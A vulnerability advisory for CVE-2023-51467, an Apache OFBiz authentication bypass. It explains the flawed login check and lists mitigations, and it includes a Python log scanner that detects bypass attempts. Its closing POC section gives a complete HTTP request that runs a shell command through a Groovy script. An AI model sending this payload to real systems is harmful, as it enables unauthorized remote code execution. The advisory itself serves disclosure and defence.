Vulnerable Version: Apache OFBiz < 18.12.11
Fixed Version: Apache OFBiz 18.12.11
Base Score: 9.8 CRITICAL
Vendor Description:-
Apache OFBiz is an open-source ERP framework. It supports a wide range of online applications used for a variety of company operations, including human resources, accounting, inventory management, customer relationship management, and marketing. While less common than some commercial equivalents, it is critical to the enterprises that rely on it for sensitive business activities.
CVE-2023-51467 Description:-
This vulnerability results from an incomplete fix for CVE-2023-49070. In Apache OFBiz 18.12.10 the developers removed the XML-RPC component to address the earlier RCE, but the underlying authentication bypass remained.
In this test scenario, the USERNAME and PASSWORD parameters are left blank and the URI carries the parameter requirePasswordChange=Y.
Because both the username and the password are empty and requirePasswordChange is set to 'Y', the login method returns the string "requirePasswordChange". These values are then passed through the checkLogin method. Surprisingly, the flow never enters the conditional block that would reject the request: the checks (username == null) and (password == null) both evaluate to false, because the parameters are present as empty strings rather than null. Likewise, "error".equals(login(request, response)) evaluates to false, because login returned "requirePasswordChange" rather than "error".
As a result, checkLogin returns successfully and authentication is bypassed.
Impact:-
Organizations relying on Apache OFBiz may be at risk of:
- Unauthorized information access
- Loss of data integrity
- Compromise of sensitive business information
- Total control of affected server environments by malicious actors
Mitigations:-
Upgrade to Apache OFBiz 18.12.11
- This version includes the official patch addressing the insecure request handler vulnerability.
Restrict Network Access
- Until the upgrade is performed, limit external access to the OFBiz instance using firewall rules or reverse proxy controls.
Monitor for Unusual Activity
- Review access logs for unauthorized or unauthenticated access attempts to internal endpoints.
Apply Web Application Firewall (WAF) Rules
- Use a WAF to block suspicious or malformed requests that attempt to exploit this authentication bypass.
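As an added example that is not part of the original advisory, the following Python scans access-log lines for the parameter shape described above: USERNAME and PASSWORD present but empty, combined with requirePasswordChange=Y. The log lines, IP addresses, timestamps and combined-log format are constructed for illustration; a POST body is not recorded in an access log, so only the query-string variant of the request is detected.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Dec/2023:10:01:02 +0000] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 512
10.0.0.6 - - [26/Dec/2023:10:01:05 +0000] "GET /webtools/control/main HTTP/1.1" 200 3041
10.0.0.7 - - [26/Dec/2023:10:02:11 +0000] "POST /webtools/control/login?USERNAME=admin&PASSWORD=x&requirePasswordChange=Y HTTP/1.1" 200 128
10.0.0.8 - - [26/Dec/2023:10:03:00 +0000] "GET /webtools/control/xmlrpc?USERNAME=&PASSWORD= HTTP/1.1" 404 0
"""

# client ip, timestamp, request line (method + target), status code
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def is_bypass_attempt(target: str) -> bool:
    """True when the query string carries the bypass shape from the advisory:
    USERNAME and PASSWORD are present but empty, and requirePasswordChange=Y.
    keep_blank_values=True is essential: without it parse_qs drops the empty
    parameters and the pattern can never match."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)

    def present_but_empty(name: str) -> bool:
        return name in query and all(v == "" for v in query[name])

    return (
        present_but_empty("USERNAME")
        and present_but_empty("PASSWORD")
        and "Y" in query.get("requirePasswordChange", [])
    )


def scan_log(text: str):
    """Return (ip, method, path, status) for each matching request.
    A 200 response to such a request suggests the bypass succeeded."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_bypass_attempt(m["target"]):
            hits.append((m["ip"], m["method"], urlsplit(m["target"]).path, int(m["status"])))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("possible CVE-2023-51467 bypass attempt:", hit)
```

Requests with empty credentials but no requirePasswordChange=Y (the last sample line) are deliberately not flagged here, since they do not match the flow the advisory describes; widen the check if a noisier alert is acceptable.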
POC:-
Sending the following request executes the command id through a Groovy script:
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.1.17:8443
Cookie: JSESSIONID=A901D3EC27EAE7090061788B37301695.jvm1; OFBiz.Visitor=10001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);